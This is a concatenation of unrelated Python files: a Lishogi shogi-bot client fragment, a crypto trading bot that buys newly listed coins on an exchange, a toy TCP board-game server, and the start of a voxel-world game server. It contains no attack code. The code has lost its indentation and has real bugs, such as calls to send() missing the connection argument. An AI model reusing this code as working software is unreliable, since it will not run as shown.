logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
logger.info("start")
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
logger.info(event)
except Exception:
logger.exception("Error reading control stream; retrying")
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
control_queue = multiprocessing.Manager().Queue()
control_stream = Process(target=watch_control_stream, args=[control_queue, li])
control_stream.start()
while not terminated:
event = control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "challenge":
logger.info("chlng detected")
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
logger.info("chlng supported")
try:
logger.info(" Accept {}".format(chlng))
response = li.accept_challenge(chlng.id)
logger.info(chlng.id)
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except Exception:
pass
elif event["type"] == "gameStart":
logger.info("game detected")
game_id = event["game"]["id"]
play_game(li, game_id, engine_factory, user_profile, config)
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, engine_factory, user_profile, config):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
#Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
engineeng = engine_factory(board)
logger.info("+++ {}".format(game))
if is_engine_move(game,board.move_stack) and not is_game_over(game):
move = engineeng.search(board, 5000, 5000, 1, 1)
finalmove = switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
while not terminated:
try:
binary_chunk = next(lines)
except StopIteration:
break
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if not board.is_game_over():
if u_type == "gameState":
game.state = upd
moves = upd["moves"].split()
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
move = engineeng.search(board, upd['wtime'], upd['btime'], upd['winc'], upd['binc'])
finalmove = switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
else:
logger.info("game over")
engineeng.quit()
break
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
main.py | from collections import defaultdict
import copy
from datetime import datetime
from json import JSONEncoder
import json
import os.path
import sys, os
import threading
import time
import globals
from load_config import *
from logger import logger
from new_listings_scraper import *
from store_order import *
from trade_client import *
# To add a coin to ignore, add it to the json array in old_coins.json
globals.old_coins = load_old_coins()
logger.debug(f"old_coins: {globals.old_coins}")
# loads local configuration
config = load_config('config.yml')
# load necessary files
if os.path.isfile('sold.json'):
sold_coins = load_order('sold.json')
else:
sold_coins = {}
if os.path.isfile('order.json'):
order = load_order('order.json')
else:
order = {}
# memory store for all orders for a specific coin
if os.path.isfile('session.json'):
session = load_order('session.json')
else:
session = {}
# Keep the supported currencies loaded in RAM so no time is wasted fetching
# currencies.json from disk when an announcement is made
global supported_currencies
logger.debug("Starting get_all_currencies")
supported_currencies = get_all_currencies(single=True)
logger.debug("Finished get_all_currencies")
def buy():
while not globals.stop_threads:
logger.debug('Waiting for buy_ready event')
globals.buy_ready.wait()
logger.debug('buy_ready event triggered')
if globals.stop_threads:
break
announcement_coin = globals.latest_listing
global supported_currencies
if announcement_coin and \
announcement_coin not in order and \
announcement_coin not in sold_coins and \
announcement_coin not in globals.old_coins:
logger.info(
f'New announcement detected: {announcement_coin}')
if not supported_currencies:
supported_currencies = get_all_currencies(single=True)
if supported_currencies:
if announcement_coin in supported_currencies:
logger.debug("Starting get_last_price")
# get latest price object
obj = get_last_price(announcement_coin, globals.pairing, False)
price = obj.price
if float(price) <= 0:
continue # wait for positive price
if announcement_coin not in session:
session[announcement_coin] = {}
session[announcement_coin].update({'total_volume': 0})
session[announcement_coin].update({'total_amount': 0})
session[announcement_coin].update({'total_fees': 0})
session[announcement_coin]['orders'] = list()
# initialize order object
if announcement_coin not in order:
volume = globals.quantity - session[announcement_coin]['total_volume']
order[announcement_coin] = {}
order[announcement_coin]['_amount'] = f'{volume / float(price)}'
order[announcement_coin]['_left'] = f'{volume / float(price)}'
order[announcement_coin]['_fee'] = f'{0}'
order[announcement_coin]['_tp'] = f'{0}'
order[announcement_coin]['_sl'] = f'{0}'
order[announcement_coin]['_status'] = 'unknown'
if announcement_coin in session:
if len(session[announcement_coin]['orders']) == 0:
order[announcement_coin]['_status'] = 'test_partial_fill_order'
else:
order[announcement_coin]['_status'] = 'cancelled'
amount = float(order[announcement_coin]['_amount'])
left = float(order[announcement_coin]['_left'])
status = order[announcement_coin]['_status']
if left - amount != 0:
# partial fill.
amount = left
logger.info(
f'starting buy place_order with : {announcement_coin=} | {globals.pairing=} | {volume=} | {amount=} x {price=} | side = buy | {status=}')
try:
# Run a test trade if true
if globals.test_mode:
if order[announcement_coin]['_status'] == 'cancelled':
status = 'closed'
left = 0
fee = f'{float(amount) * 0.002}'
else:
status = 'cancelled'
left = f'{amount * 0.66}'
fee = f'{float(amount - float(left)) * 0.002}'
order[announcement_coin] = {
'_fee_currency': announcement_coin,
'_price': f'{price}',
'_amount': f'{amount}',
'_time': datetime.timestamp(datetime.now()),
'_tp': globals.tp,
'_sl': globals.sl,
'_ttp': globals.ttp,
'_tsl': globals.tsl,
'_id': 'test-order',
'_text': 'test-order',
'_create_time': datetime.timestamp(datetime.now()),
'_update_time': datetime.timestamp(datetime.now()),
'_currency_pair': f'{announcement_coin}_{globals.pairing}',
'_status': status,
'_type': 'limit',
'_account': 'spot',
'_side': 'buy',
'_iceberg': '0',
'_left': f'{left}',
'_fee': fee
}
logger.info('PLACING TEST ORDER')
logger.info(order[announcement_coin])
# place a live order if False
else:
# just in case...stop buying more than our config amount
assert amount * float(price) <= float(volume)
order[announcement_coin] = place_order(announcement_coin, globals.pairing, volume, 'buy', price)
order[announcement_coin] = order[announcement_coin].__dict__
order[announcement_coin].pop("local_vars_configuration")
order[announcement_coin]['_tp'] = globals.tp
order[announcement_coin]['_sl'] = globals.sl
order[announcement_coin]['_ttp'] = globals.ttp
order[announcement_coin]['_tsl'] = globals.tsl
logger.debug('Finished buy place_order')
except Exception as e:
logger.error(e)
else:
order_status = order[announcement_coin]['_status']
logger.info(
f'Order created on {announcement_coin} at a price of {price} each. {order_status=}')
if order_status == "closed":
order[announcement_coin]['_amount_filled'] = order[announcement_coin]['_amount']
session[announcement_coin]['total_volume'] += (float(order[announcement_coin]['_amount']) * float(order[announcement_coin]['_price']))
session[announcement_coin]['total_amount'] += float(order[announcement_coin]['_amount'])
session[announcement_coin]['total_fees'] += float(order[announcement_coin]['_fee'])
session[announcement_coin]['orders'].append(copy.deepcopy(order[announcement_coin]))
# update order to sum all amounts and all fees
# this will set up our sell order for sale of all filled buy orders
tf = session[announcement_coin]['total_fees']
ta = session[announcement_coin]['total_amount']
order[announcement_coin]['_fee'] = f'{tf}'
order[announcement_coin]['_amount'] = f'{ta}'
store_order('order.json', order)
store_order('session.json', session)
# We're done. Stop buying and finish up the selling.
globals.sell_ready.set()
globals.buy_ready.clear()
logger.info(
f'Order on {announcement_coin} closed')
else:
if order_status == "cancelled" and float(order[announcement_coin]['_amount']) > float(order[announcement_coin]['_left']) and float(order[announcement_coin]['_left']) > 0:
# partial order. Change qty and fee_total in order and finish any remaining balance
partial_amount = float(order[announcement_coin]['_amount']) - float(order[announcement_coin]['_left'])
partial_fee = float(order[announcement_coin]['_fee'])
order[announcement_coin]['_amount_filled'] = f'{partial_amount}'
session[announcement_coin]['total_volume'] += (partial_amount * float(order[announcement_coin]['_price']))
session[announcement_coin]['total_amount'] += partial_amount
session[announcement_coin]['total_fees'] += partial_fee
session[announcement_coin]['orders'].append(copy.deepcopy(order[announcement_coin]))
logger.info(f"Partial fill order detected. {order_status=} | {partial_amount=} out of {amount=} | {partial_fee=} | {price=}")
# FUTURE: We'll probably want to start attempting to sell in the future immediately after ordering any amount
# It would require at least a minor refactor, since order is getting cleared and
# it seems that this function depends on order being empty, but sell() depends on order not being empty.
# globals.sell_ready.set()
# order not filled, try again.
logger.info(f"Clearing order with a status of {order_status}. Waiting for 'closed' status")
order.pop(announcement_coin) # reset for next iteration
else:
logger.warning(
f'{announcement_coin=} is not supported on gate io')
logger.info(f"Adding {announcement_coin} to old_coins.json")
globals.old_coins.append(announcement_coin)
store_old_coins(globals.old_coins)
else:
logger.error('supported_currencies is not initialized')
# else:
# logger.info( 'No coins announced, or coin has already been bought/sold. Checking more frequently in case TP and SL need updating')
time.sleep(3)
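# A minimal sketch (hypothetical numbers, never called) of the partial-fill
# accounting in buy() above: a cancelled order that filled part of its amount
# only contributes the filled portion to the session totals.
def _demo_partial_fill_accounting():
    amount, left, price = 10.0, 3.4, 0.25
    partial_amount = amount - left          # 6.6 units actually filled
    volume_filled = partial_amount * price  # quote-currency value of the fill
    assert round(partial_amount, 8) == 6.6
    assert round(volume_filled, 8) == 1.65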
def sell():
while not globals.stop_threads:
logger.debug('Waiting for sell_ready event')
globals.sell_ready.wait()
logger.debug('sell_ready event triggered')
if globals.stop_threads:
break
# check if the order file exists and load the current orders
# basically the sell block and update TP and SL logic
if len(order) > 0:
for coin in list(order):
if float(order[coin]['_tp']) == 0:
st = order[coin]['_status']
logger.info(f"Order is initialized but not ready. Continuing. | Status={st}")
continue
# store some necessary trade info for a sell
coin_tp = order[coin]['_tp']
coin_sl = order[coin]['_sl']
volume = order[coin]['_amount']
stored_price = float(order[coin]['_price'])
symbol = order[coin]['_fee_currency']
# avoid div by zero error
if float(stored_price) == 0:
continue
logger.debug(f'Data for sell: {coin=} | {stored_price=} | {coin_tp=} | {coin_sl=} | {volume=} | {symbol=} ')
logger.info(f'get_last_price existing coin: {coin}')
obj = get_last_price(symbol, globals.pairing, False)
last_price = obj.price
logger.info("Finished get_last_price")
top_position_price = stored_price + (stored_price*coin_tp /100)
stop_loss_price = stored_price + (stored_price*coin_sl /100)
# need positive price or continue and wait
if float(last_price) == 0:
continue
logger.info(f'{symbol=}-{last_price=}\t[STOP: ${"{:,.5f}".format(stop_loss_price)} or {"{:,.2f}".format(coin_sl)}%]\t[TOP: ${"{:,.5f}".format(top_position_price)} or {"{:,.2f}".format(coin_tp)}%]\t[BUY: ${"{:,.5f}".format(stored_price)} (+/-): {"{:,.2f}".format(((float(last_price) - stored_price) / stored_price) * 100)}%]')
# update stop loss and take profit values if threshold is reached
if float(last_price) > stored_price + (
stored_price * coin_tp / 100) and globals.enable_tsl:
# increase as absolute value for TP
new_tp = float(last_price) + (float(last_price) * globals.ttp / 100)
# convert back into % difference from when the coin was bought
new_tp = float((new_tp - stored_price) / stored_price * 100)
# same deal as above, only applied to trailing SL
new_sl = float(last_price) + (float(last_price)*globals.tsl / 100)
new_sl = float((new_sl - stored_price) / stored_price * 100)
# new values to be added to the json file
order[coin]['_tp'] = new_tp
order[coin]['_sl'] = new_sl
store_order('order.json', order)
new_top_position_price = stored_price + (stored_price*new_tp /100)
new_stop_loss_price = stored_price + (stored_price*new_sl /100)
logger.info(f'updated tp: {round(new_tp, 3)}% / ${"{:,.3f}".format(new_top_position_price)}')
logger.info(f'updated sl: {round(new_sl, 3)}% / ${"{:,.3f}".format(new_stop_loss_price)}')
# close trade if tsl is reached or trail option is not enabled
elif float(last_price) < stored_price + (
stored_price * coin_sl / 100) or float(last_price) > stored_price + (
stored_price * coin_tp / 100) and not globals.enable_tsl:
try:
fees = float(order[coin]['_fee'])
sell_volume_adjusted = float(volume) - fees
logger.info(
f'starting sell place_order with :{symbol} | {globals.pairing} | {volume} | {sell_volume_adjusted} | {fees} | {float(sell_volume_adjusted)*float(last_price)} | side=sell | last={last_price}')
# sell for real if test mode is set to false
if not globals.test_mode:
sell = place_order(symbol, globals.pairing, float(sell_volume_adjusted)*float(last_price), 'sell', last_price)
logger.info("Finish sell place_order")
#check for completed sell order
if sell._status != 'closed':
# change order to sell remaining
if float(sell._left) > 0 and float(sell._amount) > float(sell._left):
# adjust down order _amount and _fee
order[coin]['_amount'] = sell._left
order[coin]['_fee'] = f'{fees - (float(sell._fee) / float(sell._price))}'
# add sell order to sold.json (handled better in session.json now)
# NOTE: this originally keyed on f"{coin}_{id}", which reads the local name
# `id` before it is assigned (UnboundLocalError). Key on the order's own id
# instead (assumes the order object exposes `_id`, as the test orders do).
sell_id = f"{coin}_{sell._id}"
sold_coins[sell_id] = sell.__dict__
sold_coins[sell_id].pop("local_vars_configuration")
logger.info(f"Sell order did not close! {sell._left} of {coin} remaining. Adjusted order _amount and _fee to perform sell of remaining balance")
# add to session orders
try:
if len(session) > 0:
dp = copy.deepcopy(sold_coins[sell_id])
session[coin]['orders'].append(dp)
except Exception as e:
logger.error(e)
pass
# keep going. Not finished until status is 'closed'
continue
logger.info(
f'sold {coin} with {round((float(last_price) - stored_price) * float(volume), 3)} profit | {round((float(last_price) - stored_price) / float(stored_price)*100, 3)}% PNL')
# remove order from json file
order.pop(coin)
store_order('order.json', order)
logger.debug('Order saved in order.json')
globals.sell_ready.clear()
except Exception as e:
logger.error(e)
# store sold trades data
else:
if not globals.test_mode:
sold_coins[coin] = sell.__dict__
sold_coins[coin].pop("local_vars_configuration")
sold_coins[coin]['profit'] = f'{float(last_price) - stored_price}'
sold_coins[coin]['relative_profit_%'] = f'{(float(last_price) - stored_price) / stored_price * 100}%'
else:
sold_coins[coin] = {
'symbol': coin,
'price': last_price,
'volume': volume,
'time': datetime.timestamp(datetime.now()),
'profit': f'{float(last_price) - stored_price}',
'relative_profit_%': f'{(float(last_price) - stored_price) / stored_price * 100}%',
'id': 'test-order',
'text': 'test-order',
'create_time': datetime.timestamp(datetime.now()),
'update_time': datetime.timestamp(datetime.now()),
'currency_pair': f'{symbol}_{globals.pairing}',
'status': 'closed',
'type': 'limit',
'account': 'spot',
'side': 'sell',
'iceberg': '0',
}
logger.info(f'Sold coins:\r\n {sold_coins[coin]}')
# add to session orders
try:
if len(session) > 0:
dp = copy.deepcopy(sold_coins[coin])
session[coin]['orders'].append(dp)
store_order('session.json', session)
logger.debug('Session saved in session.json')
except Exception as e:
logger.error(e)
pass
store_order('sold.json', sold_coins)
logger.info('Order saved in sold.json')
else:
logger.debug("Size of order is 0")
time.sleep(3)
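# A minimal sketch (hypothetical values, never called) of the trailing TP/SL
# update in sell() above: when the price crosses the current take-profit
# level, both levels are recomputed from the latest price and re-expressed as
# percentages relative to the original buy price.
def _demo_trailing_levels():
    stored_price, last_price = 100.0, 110.0  # bought at 100, now trading at 110
    ttp, tsl = 2.0, -3.0                     # trailing offsets in percent
    new_tp = last_price + last_price * ttp / 100           # 112.2 absolute
    new_tp = (new_tp - stored_price) / stored_price * 100  # 12.2% from buy
    new_sl = last_price + last_price * tsl / 100           # 106.7 absolute
    new_sl = (new_sl - stored_price) / stored_price * 100  # 6.7% from buy
    assert round(new_tp, 1) == 12.2 and round(new_sl, 1) == 6.7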
def main():
"""
Sells, adjusts TP and SL according to trailing values
and buys new coins
"""
# Protection from stale announcement
latest_coin = get_last_coin()
if latest_coin:
globals.latest_listing = latest_coin
# store config deets
globals.quantity = config['TRADE_OPTIONS']['QUANTITY']
globals.tp = config['TRADE_OPTIONS']['TP']
globals.sl = config['TRADE_OPTIONS']['SL']
globals.enable_tsl = config['TRADE_OPTIONS']['ENABLE_TSL']
globals.tsl = config['TRADE_OPTIONS']['TSL']
globals.ttp = config['TRADE_OPTIONS']['TTP']
globals.pairing = config['TRADE_OPTIONS']['PAIRING']
globals.test_mode = config['TRADE_OPTIONS']['TEST']
globals.stop_threads = False
globals.buy_ready.clear()
if not globals.test_mode:
logger.info('!!! LIVE MODE !!!')
t_get_currencies_thread = threading.Thread(target=get_all_currencies)
t_get_currencies_thread.start()
t_buy_thread = threading.Thread(target=buy)
t_buy_thread.start()
t_sell_thread = threading.Thread(target=sell)
t_sell_thread.start()
try:
search_and_update()
except KeyboardInterrupt:
logger.info('Stopping Threads')
globals.stop_threads = True
globals.buy_ready.set()
globals.sell_ready.set()
t_get_currencies_thread.join()
t_buy_thread.join()
t_sell_thread.join()
if __name__ == '__main__':
logger.info('started working...')
main()
logger.info('stopped working...')
|
chess_server.py | import sys
import socket
import atexit
import threading
HOST = "127.0.0.1"
PORT = 23333
MAX_CONNECTIONS = 8
MAX_BUFFER_SIZE = 2048
ENCODING = "utf-8"
if len(sys.argv) > 2:
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
# str:connection
user = {}
# reg {name}
# send {name} {message}
# place {name} {x} {y}
# status -> {B/W/E/N}
# get -> char[][] {B/w/N}
# clear
# exit
def quit():
global s
s.close()
# register after the definition; registering earlier would capture the builtin quit
atexit.register(quit)
def send(conn, message):
conn.sendall(message.encode(ENCODING))
chessboard = []
def clear(chessboard):
chessboard.clear()
for i in range(0, 19):
chessboard.append([])
for j in range(0, 19):
chessboard[-1].append("N")
clear(chessboard)  # initialize the 19x19 board so "place"/"get" work before any "clear"
def to_string(chessboard):
data = ""
for line in chessboard:
data += "".join(line)
return data
def place(chessboard, name, x, y):
chessboard[x][y] = name
def serve(conn, addr):
global user
global chessboard
name = "Unknown Guest"
status = "N"
while True:
buf = conn.recv(MAX_BUFFER_SIZE)
command = buf.decode(ENCODING).strip()
print("(info) Message from %s:%s: %s" % (addr[0], addr[1], command.strip()))
parameters = command.split(" ")
token = parameters[0].lower()
if token == "reg":
user[parameters[1]] = conn
name = parameters[1]
print("(info) Register new user: %s" % name)
elif token == "send":
send(user[parameters[1]], " ".join(parameters[2:]))
elif token == "place":
place(
chessboard,
parameters[1],
int(parameters[2]), int(parameters[3])
)
elif token == "status":
send(status)
elif token == "get":
send(to_string(chessboard))
elif token == "clear":
clear(chessboard)
elif token == "exit":
conn.close()
user.pop(name)
print("(warn) %s left the server" % name)
return None
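# A minimal client sketch (illustrative only, never called here): speaks the
# whitespace-separated command protocol documented above. Assumes the server
# is already listening on HOST:PORT, and that each command arrives as its own
# recv() on the server side (the protocol has no framing, so rapid sends may
# coalesce).
def _example_client(name="alice"):
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.connect((HOST, PORT))
    c.sendall("reg {}".format(name).encode(ENCODING))        # register a user
    c.sendall("place {} 3 4".format(name).encode(ENCODING))  # stone at (3, 4)
    c.sendall("get".encode(ENCODING))                        # request the board
    board = c.recv(MAX_BUFFER_SIZE).decode(ENCODING)         # 19x19 flat string
    c.sendall("exit".encode(ENCODING))
    c.close()
    return board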
s.listen(MAX_CONNECTIONS)
while True:
conn, addr = s.accept()
print("(info) New connection from %s:%s" % addr)
t = threading.Thread(target=serve, args=(conn, addr))
t.start()
|
server.py | #!/usr/bin/env python
from math import floor
from world import World, show_clouds, show_plants, show_trees
import atexit
import datetime
import random
import re
#import requests
import sqlite3
import sys
import threading
import time
import traceback
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
import SocketServer as socketserver
else:
import queue
import socketserver
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 4080
DB_PATH = 'my.piworld'
LOG_PATH = 'log.txt'
CHUNK_SIZE = 16
BUFFER_SIZE = 4096
COMMIT_INTERVAL = 5
MAX_LOCAL_PLAYERS = 4
MAX_SIGN_LENGTH = 256
AUTH_REQUIRED = False
DAY_LENGTH = 600
SPAWN_POINT = (0, 0, 0, 0, 0)
RATE_LIMIT = False
RECORD_HISTORY = False
INDESTRUCTIBLE_ITEMS = set([16])
ALLOWED_ITEMS = set([
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
17, 18, 19, 20, 21, 22, 23,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63])
ADD = 'F'
AUTHENTICATE = 'A'
BLOCK = 'B'
CHUNK = 'C'
DISCONNECT = 'D'
EVENT = 'v'
EXTRA = 'e'
GOTO = 'G'
KEY = 'K'
LIGHT = 'L'
NICK = 'N'
OPTION = 'O'
POSITION = 'P'
PQ = 'Q'
REDRAW = 'R'
REMOVE = 'X'
SHAPE = 's'
SIGN = 'S'
SPAWN = 'W'
TALK = 'T'
TIME = 'E'
TRANSFORM = 't'
VERSION = 'V'
YOU = 'U'
worldgen = ""
try:
from config import *
except ImportError:
pass
def log(*args):
now = datetime.datetime.utcnow()
line = ' '.join(map(str, (now,) + args))
print(line)
with open(LOG_PATH, 'a') as fp:
fp.write('%s\n' % line)
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
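# A small illustration (illustrative only, never called): world coordinates
# map onto CHUNK_SIZE-wide chunk indices, rounding toward negative infinity
# so that negative coordinates fall into negative chunks.
def _demo_chunked():
    assert chunked(0) == 0 and chunked(15) == 0
    assert chunked(16) == 1
    assert chunked(-1) == -1  # floor, not truncation toward zero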
def packet(*args):
return '%s\n' % ','.join(map(str, args))
class RateLimiter(object):
def __init__(self, rate, per):
self.rate = float(rate)
self.per = float(per)
self.allowance = self.rate
self.last_check = time.time()
def tick(self):
if not RATE_LIMIT:
return False
now = time.time()
elapsed = now - self.last_check
self.last_check = now
self.allowance += elapsed * (self.rate / self.per)
if self.allowance > self.rate:
self.allowance = self.rate
if self.allowance < 1:
return True # too fast
else:
self.allowance -= 1
return False # okay
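# A minimal usage sketch (illustrative only, never called): RateLimiter is a
# token bucket allowing `rate` events per `per` seconds. tick() returns True
# once a caller exceeds that budget; note it always returns False while the
# module-level RATE_LIMIT flag is disabled.
def _demo_rate_limiter(lines):
    limiter = RateLimiter(rate=100, per=5)
    for _ in lines:
        if limiter.tick():
            return False  # too fast; Handler reacts by closing the socket
    return True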
class Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Player:
def __init__(self, nick, position, pid):
self.pid = pid
self.nick = nick
self.position = position
self.is_active = False
class Handler(socketserver.BaseRequestHandler):
def setup(self):
self.position_limiter = RateLimiter(100, 5)
self.limiter = RateLimiter(1000, 10)
self.version = None
self.client_id = None
self.user_id = None
self.queue = queue.Queue()
self.running = True
self.players = []
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
if is_py2:
data = self.request.recv(BUFFER_SIZE)
else:
data = str(self.request.recv(BUFFER_SIZE), 'utf-8')
if not data:
break
buf.extend(data.replace('\r\n', '\n'))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
if not line:
continue
if line[0] == POSITION:
if self.position_limiter.tick():
log('RATE', self.client_id)
self.stop()
return
else:
if self.limiter.tick():
log('RATE', self.client_id)
self.stop()
return
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def stop(self):
self.request.close()
def start(self):
thread = threading.Thread(target=self.run)
thread.daemon = True
thread.start()
def run(self):
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except queue.Empty:
pass
except queue.Empty:
continue
data = ''.join(buf)
if is_py2:
self.request.sendall(data)
else:
self.request.sendall(bytes(data, 'utf-8'))
except Exception:
self.request.close()
raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
self.send_raw(packet(*args))
def active_players(self):
return [x for x in self.players if x.is_active]
class Model(object):
def __init__(self, seed):
self.world = World(seed)
self.clients = []
self.queue = queue.Queue()
self.commands = {
ADD: self.on_add,
AUTHENTICATE: self.on_authenticate,
CHUNK: self.on_chunk,
BLOCK: self.on_block,
EVENT: self.on_control_callback,
EXTRA: self.on_extra,
GOTO: self.on_goto,
LIGHT: self.on_light,
NICK: self.on_nick,
POSITION: self.on_position,
PQ: self.on_pq,
REMOVE: self.on_remove,
TALK: self.on_talk,
SHAPE: self.on_shape,
SIGN: self.on_sign,
SPAWN: self.on_spawn,
TRANSFORM: self.on_transform,
VERSION: self.on_version,
}
self.patterns = [
(re.compile(r'^/help(?:\s+(\S+))?$'), self.on_help),
(re.compile(r'^/list$'), self.on_list),
]
self.running = True
def finish(self):
self.running = False
def start(self):
thread = threading.Thread(target=self.run)
thread.daemon = True
thread.start()
self.thread = thread
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
query = (
'select value from option where '
'name = :name;'
)
rows = list(self.execute(query, dict(name="show-clouds")))
if rows:
show_clouds.value = int(rows[0][0])
rows = list(self.execute(query, dict(name="show-plants")))
if rows:
show_plants.value = int(rows[0][0])
rows = list(self.execute(query, dict(name="show-trees")))
if rows:
show_trees.value = int(rows[0][0])
while self.running:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
# Commit any pending changes before exiting the thread. This will
# prevent sqlite leaving behind a journal file.
self.commit()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
'create table if not exists extra ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists extra_pqxyz_idx on '
' extra (p, q, x, y, z);',
'create table if not exists light ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists light_pqxyz_idx on '
' light (p, q, x, y, z);',
'create table if not exists shape ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists shape_pqxyz_idx on '
' shape (p, q, x, y, z);',
'create table if not exists transform ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists transform_pqxyz_idx on '
' transform (p, q, x, y, z);',
'create table if not exists sign ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' face int not null,'
' text text not null'
');',
'create index if not exists sign_pq_idx on sign (p, q);',
'create unique index if not exists sign_xyzface_idx on '
' sign (x, y, z, face);',
'create table if not exists block_history ('
' timestamp real not null,'
' user_id int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create table if not exists option ('
' name text not null,'
' value text not null'
');',
'create unique index if not exists option_idx on option (name);',
]
for query in queries:
self.execute(query)
def get_default_block(self, x, y, z):
p, q = chunked(x), chunked(z)
chunk = self.world.get_chunk(p, q)
return chunk.get((x, y, z), 0)
def get_block(self, x, y, z):
query = (
'select w from block where '
'p = :p and q = :q and x = :x and y = :y and z = :z;'
)
